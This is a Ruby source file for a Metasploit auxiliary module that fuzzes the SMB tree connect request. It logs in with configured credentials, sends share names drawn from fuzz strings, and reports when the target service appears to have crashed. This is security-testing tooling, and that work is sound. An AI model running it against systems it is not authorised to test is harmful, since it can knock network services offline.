Path: blob/master/modules/auxiliary/fuzzers/smb/smb_tree_connect.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'English'

# Auxiliary fuzzer for the SMB tree connect request.
#
# For every string produced by the Fuzzer mixin's fuzz_strings, the module
# opens a new SMB session, logs in with the configured credentials and asks
# for a tree connect whose share name is the fuzz string. The run stops at the
# first iteration in which the session can no longer be established.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::SMB::Client
  include Msf::Auxiliary::Fuzzer

  # Registers the module metadata with the framework.
  #
  # @param info [Hash] caller-supplied metadata, merged through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'SMB Tree Connect Request Fuzzer',
        'Description' => %q{
          This module sends a series of SMB tree connect
          requests using malicious strings.
        },
        'Author' => [ 'hdm' ],
        'License' => MSF_LICENSE,
        'Notes' => {
          # Declares that a run can leave the target service down.
          'Stability' => [CRASH_SERVICE_DOWN],
          # NOTE(review): declared empty although do_smb_connect logs in to the
          # target on every iteration; confirm whether IOC_IN_LOGS belongs here.
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )
  end

  # Opens a fresh SMB session and requests a tree connect to the share +pkt+.
  #
  # @connected is cleared on entry and set only once both the transport
  # connect and the login have returned. An exception raised by the tree
  # connect itself therefore leaves @connected true, while an exception from
  # connect or login leaves it false.
  #
  # @param pkt [String] fuzz string placed verbatim in the share component of
  #   the UNC path
  # @param _opts [Object] ignored by this method; run passes 0.25 here
  def do_smb_connect(pkt, _opts = {})
    @connected = false
    connect

    credentials = %w[SMBName SMBUser SMBPass SMBDomain].map { |option| datastore[option] }
    simple.login(*credentials)

    @connected = true
    share_path = "\\\\#{datastore['RHOST']}\\#{pkt}"
    simple.connect(share_path)
  end

  # Drives the fuzzing loop and reports the input that preceded a lost service.
  #
  # Errors other than Interrupt are recorded, not raised: only @connected
  # decides whether the loop continues. When a session cannot be established
  # after at least one earlier successful iteration, the previous iteration's
  # string (hex-encoded) and fuzzer name are printed as the likely cause.
  #
  # Any exception from connect or login leaves @connected false, so a refused
  # login or a network fault is reported the same way as a crashed service.
  def run
    iteration = 0
    prev_string = nil
    prev_fuzzer = nil
    failure = nil

    fuzz_strings do |candidate|
      iteration += 1

      # Progress line every 100 iterations.
      print_status("Fuzzing with iteration #{iteration} using #{@last_fuzzer_input}") if (iteration % 100).zero?

      begin
        do_smb_connect(candidate, 0.25)
      rescue ::Interrupt
        print_status("Exiting on interrupt: iteration #{iteration} using #{@last_fuzzer_input}")
        raise $ERROR_INFO
      rescue StandardError => e
        failure = e
      ensure
        # Tear the session down whether or not the attempt succeeded.
        disconnect
      end

      unless @connected
        report =
          if prev_string
            "The service may have crashed: iteration:#{iteration - 1} method=#{prev_fuzzer} string=#{prev_string.unpack1('H*')} error=#{failure}"
          else
            # The very first attempt failed, so no earlier input can be blamed.
            "Could not connect to the service: #{failure}"
          end
        print_status(report)
        return
      end

      prev_string = candidate
      prev_fuzzer = @last_fuzzer_input
    end
  end
end